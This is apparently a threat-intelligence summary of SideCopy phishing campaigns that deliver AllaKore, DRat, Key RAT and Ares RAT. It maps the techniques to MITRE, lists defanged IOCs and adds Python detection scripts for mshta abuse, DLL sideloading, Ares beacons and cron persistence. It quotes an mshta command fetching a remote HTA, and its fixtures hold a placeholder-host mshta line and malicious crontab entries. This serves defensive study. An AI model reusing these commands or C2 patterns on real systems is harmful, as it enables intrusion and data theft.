Keypoints
- Phishing lures deliver archives (double-extension .lnk or WinRAR archives) that trigger remote HTA or ShellExecute-based payload execution.
- WinRAR CVE-2023-38831 is exploited to silently execute payloads inside archived folders via ShellExecute.
- Windows chain: .lnk → mshta.exe retrieves base64-embedded HTA/DLL → in-memory DLL decode and execution; DLL sideloading via legitimate executables provides persistence.
- Linux chain: archive drops ELF/PyInstaller payloads; stage1 creates crontab, drops decoy to ~/.local/share and runs Ares (Python) or Go-based binaries.
- Deployed payloads include AllaKore RAT, DRat, Key RAT (Windows) and a Linux variant of Ares RAT (Python), each exposing C2 channels and remote control commands.
- C2 and hosting infrastructure largely registered to Contabo GmbH; multiple compromised domains resolve to the same IPs, indicating reuse of infrastructure.
- IOCs include specific IPs (e.g., 38.242.149[.]89, 162.241.85[.]104), domains (sunfireglobal[.]in, rockwellroyalhomes[.]com), file hashes and phishing URLs.
MITRE Techniques
- [T1566.001] Spearphishing Attachment – Phishing links deliver archives that contain malicious .lnk or payloads (‘phishing link that downloads an archive file named “Homosexuality – Indian Armed Forces.”’)
- [T1203] Exploitation for Client Execution – WinRAR zero-day (CVE-2023-38831) is abused so opening a PDF launches the embedded payload via ShellExecute (‘Opening the PDF will trigger the vulnerability, quietly launching the payload inside the folder by ShellExecute function of the WinRAR application.’)
- [T1218.005] Mshta – Remote HTA files are executed via mshta.exe to fetch and run embedded code (‘C:\Windows\System32\mshta.exe “hxxps://sunfireglobal[.]in/public/assests/files/db/acr/”’)
- [T1574.002] DLL Side-Loading – Legitimate Windows executables are copied beside targets to sideload and run malicious DLLs (‘Legitimate Windows apps like Credential wizard (credwiz.exe) or EFS REKEY wizard (rekeywiz.exe) are copied beside the target to sideload the DLL.’)
- [T1053.003] Scheduled Task/Job: Cron – Linux stagers create cron entries for persistence under the current user (‘Create a crontab to maintain persistence through system reboot under the current username.’)
- [T1105] Ingress Tool Transfer – Stages and final payloads are downloaded from compromised domains to target paths during infection (‘it beacons to the same domain and downloads an HTA and the final DLL contents to their target paths.’)
- [T1027.009] Obfuscated Files or Information: Embedded Payloads – Archives/HTAs contain base64-encoded embedded decoy and DLLs which are decoded at runtime (‘It contains two embedded files that are base64 encoded; one is the decoy PDF, and the other is a DLL.’)
- [T1071.001] Application Layer Protocol: Web Protocols – Ares RAT pings C2 using HTTP(S) API endpoints for command/heartbeat (‘URL format used to ping the server is: “hxxps://(host)/api/(uid)/hello.”’)
Indicators of Compromise
- [IP] C2/hosting – 38.242.149[.]89 (AllaKore/DRat C2), 162.241.85[.]104 (compromised host), and other Contabo/hosting IPs.
- [Domain] Compromised delivery hosts – sunfireglobal[.]in, rockwellroyalhomes[.]com, and other reused domains (occoman[.]com, elfinindia[.]com, ssynergy[.]in).
- [URL] Phishing/download links – hxxps://sunfireglobal[.]in/public/core/homo/Homosexuality%20-%20Indian%20Armed%20Forces.zip, hxxps://www.rockwellroyalhomes[.]com/js/FL/DocScanner-Oct.zip.
- [File hash] Windows archives/samples – eb07a0063132e33c66d0984266afb8ae (DocScanner-Oct.zip), 8bee417262cf81bc45646da357541036 (Homosexuality – Indian Armed Forces.zip), and multiple other hashes listed.
- [File name] Decoys/payloads – ‘Homosexuality – Indian Armed Forces.pdf.lnk’, ‘DocScanner-Oct.pdf.lnk’, ‘bossupdate’ (Linux Ares), and ‘Msfront.exe’ (DRat).
- [C2 host:port] Ares endpoints – 38.242.220[.]166:9012, 161.97.151[.]220:7015 (Ares RAT API endpoints).
- [PDB / Dev Artefact] Build path – d:\Projects\C#\D-Rat\DRat Client\Tenure\obj\Release\MSEclipse.pdb (links DRat to developer/build info).
SEQRITE’s technical analysis shows two primary infection chains used by SideCopy. In the Windows chain, phishing delivers archives containing a double-extension shortcut (.pdf.lnk) which invokes mshta.exe to fetch a remote HTA; that HTA carries base64-encoded payloads (decoy PDF + DLL). The DLL is decoded and executed in-memory; sideloading via copied legitimate executables (e.g., credwiz.exe) and Run/Startup registry keys provide persistence. A separate Windows vector leverages WinRAR CVE-2023-38831 where opening the decoy PDF triggers ShellExecute inside WinRAR to silently run the payload folder contents, dropping AllaKore RAT, DRat or Key RAT binaries that connect to C2 servers for data theft, keylogging, screenshots, and remote command execution.
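The Windows chain above reduces to a few process-level signals a defender can check in endpoint telemetry: mshta.exe launched with a remote http(s) URL, a known sideload host (credwiz.exe, rekeywiz.exe) running from outside the Windows system directories, and any process spawned by mshta.exe. The following is an added example written for this summary, not SEQRITE's code or tooling; the event records are constructed Sysmon-style process-creation fields, and the hostname in the first command line is a placeholder rather than one of the report's domains.

```python
import re
from pathlib import PureWindowsPath

# Signals drawn from the chain described in the report.
REMOTE_URL = re.compile(r"https?://", re.IGNORECASE)
SIDELOAD_HOSTS = {"credwiz.exe", "rekeywiz.exe"}
SYSTEM_DIRS = {r"c:\windows\system32", r"c:\windows\syswow64"}

# Constructed process-creation events (Sysmon Event ID 1 style), not real telemetry.
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\mshta.exe",
     "cmdline": r'"C:\Windows\System32\mshta.exe" https://placeholder-compromised.invalid/public/files/db/acr/',
     "parent_image": r"C:\Windows\explorer.exe"},
    {"image": r"C:\Windows\System32\mshta.exe",          # local HTA, no remote fetch
     "cmdline": r'mshta.exe C:\Users\victim\AppData\Local\Temp\setup.hta',
     "parent_image": r"C:\Windows\explorer.exe"},
    {"image": r"C:\Users\victim\AppData\Roaming\credwiz.exe",   # copied sideload host
     "cmdline": r'"C:\Users\victim\AppData\Roaming\credwiz.exe"',
     "parent_image": r"C:\Windows\System32\mshta.exe"},
    {"image": r"C:\Windows\System32\credwiz.exe",        # legitimate location, benign
     "cmdline": r'"C:\Windows\System32\credwiz.exe"',
     "parent_image": r"C:\Windows\explorer.exe"},
]


def _under_system_dir(image: str) -> bool:
    """True when the executable sits directly in System32 or SysWOW64."""
    return str(PureWindowsPath(image).parent).lower() in SYSTEM_DIRS


def detect(event: dict) -> list:
    """Return the names of the rules a single process-creation event triggers."""
    image, cmdline, parent = event["image"], event["cmdline"], event["parent_image"]
    name = PureWindowsPath(image).name.lower()
    parent_name = PureWindowsPath(parent).name.lower()
    hits = []
    # .lnk -> mshta.exe fetching a remote HTA (T1218.005)
    if name == "mshta.exe" and REMOTE_URL.search(cmdline):
        hits.append("mshta_remote_hta")
    # credwiz.exe / rekeywiz.exe copied beside a malicious DLL (T1574.002)
    if name in SIDELOAD_HOSTS and not _under_system_dir(image):
        hits.append("sideload_host_outside_system_dir")
    # anything mshta.exe starts deserves a look in this chain
    if parent_name == "mshta.exe":
        hits.append("spawned_by_mshta")
    return hits


def scan(events: list) -> list:
    """Return (event_index, rule_names) for every event that triggers a rule."""
    return [(i, detect(e)) for i, e in enumerate(events) if detect(e)]


if __name__ == "__main__":
    for idx, rules in scan(SAMPLE_EVENTS):
        print(idx, SAMPLE_EVENTS[idx]["image"], rules)
```

The sideload rule keys on location rather than on the DLL name because the report's DLL is decoded in memory and written beside a copied host binary; a legitimate credwiz.exe only ever runs from the system directory, so the path alone is a strong signal.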
On Linux, attackers deliver Go or PyInstaller-based artifacts masquerading as PDFs; the stage1 stager creates a crontab, downloads decoy files to ~/.local/share, and drops the Ares Python agent (named ‘bossupdate’ or ‘gedit’). The Ares agent uses HTTP(S) API endpoints (hxxps://(host)/api/(uid)/hello) to heartbeat and accept commands such as upload, download, zip, screenshot, python execution, persist, clean, and shell execution. Extraction of PyInstaller contents revealed agent.pyc and config.pyc, tying the samples to Ares forks; Go binaries were analyzed with GoReSym metadata extraction where applicable.
Across campaigns, domains and IPs are reused and resolve to Contabo-hosted servers acting as C2 (examples: 38.242.149[.]89 for AllaKore/DRat, 38.242.220[.]166:9012 and 161.97.151[.]220:7015 for Ares). Defenses should inspect for .lnk->mshta patterns, WinRAR CVE exploitation activity, in-memory DLL execution, abnormal outbound HTTP(S) to the noted C2 endpoints, cron additions on Linux, and the enumerated file hashes, URLs and filenames for detection and containment.
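Two of the Linux-side detections listed above, the Ares heartbeat URL shape and cron additions under the user's home, can be checked against proxy logs and crontab output with simple pattern logic. The block below is an added example for this summary, not code from SEQRITE or from the Ares project; the proxy log lines and the crontab are constructed, while the two host:port pairs in KNOWN_ARES_C2 are the Ares endpoints from the IOC list on this page. The heartbeat regex on its own will also match unrelated `/api/<something>/hello` routes (the second constructed line shows this), so the example scores a known-endpoint match separately from the path pattern.

```python
import re
from urllib.parse import urlsplit

# Ares heartbeat shape from the report: hxxps://(host)/api/(uid)/hello
ARES_HELLO = re.compile(r"^/api/[^/]+/hello/?$")

# Ares C2 endpoints listed under Indicators of Compromise on this page.
KNOWN_ARES_C2 = {("38.242.220.166", 9012), ("161.97.151.220", 7015)}

# Constructed web-proxy log lines (not from the report):
# timestamp src_ip method url status
SAMPLE_PROXY_LOG = """\
2023-10-02T10:00:01Z 10.0.0.5 GET https://38.242.220.166:9012/api/7f3a9c/hello 200
2023-10-02T10:00:05Z 10.0.0.5 GET https://update.example.invalid/api/v1/hello 200
2023-10-02T10:00:09Z 10.0.0.7 GET http://198.51.100.20:8080/api/abc123/hello 200
2023-10-02T10:00:12Z 10.0.0.5 POST https://38.242.220.166:9012/api/7f3a9c/report 200
2023-10-02T10:00:20Z 10.0.0.9 GET https://cdn.example.invalid/static/app.js 200
"""

# Constructed crontab output (as from `crontab -l`), not from the report.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
@reboot /home/victim/.local/share/bossupdate
*/10 * * * * python3 /home/victim/.local/share/gedit >/dev/null 2>&1
0 3 * * * /usr/bin/apt-get update
"""

# Cron commands that run from a hidden directory, /tmp, or the named Ares dropper.
SUSPICIOUS_CRON = re.compile(r"/\.[^/\s]+/|/tmp/|\bbossupdate\b")


def classify_request(url: str) -> list:
    """Return the reasons a single request resembles Ares RAT traffic."""
    parts = urlsplit(url)
    host = parts.hostname or ""
    port = parts.port or (443 if parts.scheme == "https" else 80)
    reasons = []
    if (host, port) in KNOWN_ARES_C2:
        reasons.append("known_c2_endpoint")      # high confidence: IOC match
    if ARES_HELLO.match(parts.path):
        reasons.append("ares_hello_pattern")     # weak on its own, confirm with periodicity
    return reasons


def scan_proxy_log(text: str) -> list:
    """Return (src_ip, url, reasons) for every line that triggers a reason."""
    hits = []
    for line in text.splitlines():
        fields = line.split()
        if len(fields) < 5:
            continue
        _ts, src, _method, url, _status = fields[:5]
        reasons = classify_request(url)
        if reasons:
            hits.append((src, url, reasons))
    return hits


def suspicious_cron_entries(text: str) -> list:
    """Return crontab lines whose command runs from a user-writable hidden path."""
    flagged = []
    for line in text.splitlines():
        entry = line.strip()
        if not entry or entry.startswith("#"):
            continue
        if SUSPICIOUS_CRON.search(entry):
            flagged.append(entry)
    return flagged


if __name__ == "__main__":
    for src, url, reasons in scan_proxy_log(SAMPLE_PROXY_LOG):
        print(src, url, reasons)
    for entry in suspicious_cron_entries(SAMPLE_CRONTAB):
        print("cron:", entry)
```

In practice the `ares_hello_pattern` hits should be aggregated per source host and checked for a fixed beacon interval before escalation, while a `known_c2_endpoint` hit is actionable on its own.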